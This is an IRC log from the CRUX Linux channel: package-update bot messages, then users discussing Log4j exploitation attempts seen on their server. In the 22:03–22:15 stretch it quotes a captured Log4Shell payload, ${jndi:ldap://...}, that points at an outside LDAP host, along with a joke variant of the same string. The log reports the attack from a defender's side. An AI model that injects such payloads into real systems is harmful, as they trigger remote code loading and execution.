00:14 <cruxbot> [compat-32.git/3.6]: pango-32: updated .signature

02:36 <cruxbot> [contrib.git/3.6]: wine-staging: updated to version 6.23

02:39 <cruxbot> [opt.git/3.6]: nvidia-fb: updated to version 495.46

02:39 <cruxbot> [compat-32.git/3.6]: nvidia-fb-32: updated to version 495.46

02:52 <cruxbot> [contrib.git/3.6]: go: updated to version 1.17.5

02:59 <cruxbot> [opt.git/3.6]: mtools: updated to version 4.0.36

08:37 <cruxbot> [opt.git/3.6]: shared-mime-info: added a new patch to fix invalid meson.build files

09:35 <cruxbot> [opt.git/3.6]: libsdl2: fix build against wayland 1.20

09:36 <cruxbot> [opt.git/3.6]: libsdl2: add patch

09:43 <cruxbot> [opt.git/3.6]: dialog: update to 1.3-20211214

10:23 <cruxbot> [core.git/3.6]: sysvinit: update to 3.01

10:27 <cruxbot> [opt.git/3.6]: imlib2: update to 1.7.5

11:37 <cruxbot> [contrib.git/3.6]: libolm: 3.2.7 -> 3.2.8

11:37 <cruxbot> [contrib.git/3.6]: python3-olm: 3.2.7 -> 3.2.8

11:37 <cruxbot> [contrib.git/3.6]: procs: 0.11.10 -> 0.11.11

11:37 <cruxbot> [contrib.git/3.6]: python3-tomli: 1.2.2 -> 2.0.0

11:37 <cruxbot> [contrib.git/3.6]: typescript: 4.5.3 -> 4.5.4

11:37 <cruxbot> [contrib.git/3.6]: zellij: 0.21.0 -> 0.22.0

21:09 <Mellowlink> did anyone try to run npf on top of crux?

21:09 <Mellowlink> https://github.com/rmind/npf

21:10 <ocb> saw the question few days ago but you quit soon after and forgot to answer later on. haven't tried building npf on crux, using it only on netbsd for now.

21:11 <ocb> would also be interested in that, got a bit used to the format.

22:03 <frinnst> Attack Name Apache.Log4j.Error.Log.Remote.Code.Execution

22:03 <frinnst> IP 111.28.189.51

22:03 <frinnst> Source Port 47188

22:03 <frinnst> Country/Region China

22:03 <frinnst> quite a few attempts

22:04 <frinnst> ${jndi:ldap:

22:04 <frinnst> URL /?api=${jndi:ldap://distfiles.crux.guru.774dda06.dataastatistics.com/help}

22:05 <ocb> oh he uses the server fqdn

22:05 <frinnst> not sure when fortinet released the update to detect it, but started to see it on saturday

22:08 <frinnst> nice switch from the regular php vulnerabilities these scrips try

22:11 <frinnst> "F-Secure's CISO Erka Koivunen echoed all the usual warnings, adding: "Please don’t change your Tesla or iPhone name into ${jndi:ldap://url/a} unless you want unexpected user experience.""

22:14 <ocb> wonder if that would actually work? :)

22:14 <stenur> spoiler: got neither, want neither :)

22:14 <frinnst> well yeah, it should. assuming the hostname gets logged

22:15 <frinnst> i'd bet ubiquiti unifi would be very vulnerable to this

22:15 <frinnst> bobby tables lives on

22:21 <stenur> It only reminded me of the German Linux Magazine article of Mike Schilli aka perlmeister.com -- it was 2003!

22:22 <stenur> Januar 2003: Loggen für Faule (Linux-Magazin, Januar 2003) - perlmeister ("logging for the lazy")

22:22 <stenur> Ha! I am not!!!

22:22 <stenur> ..just beetling on a bit..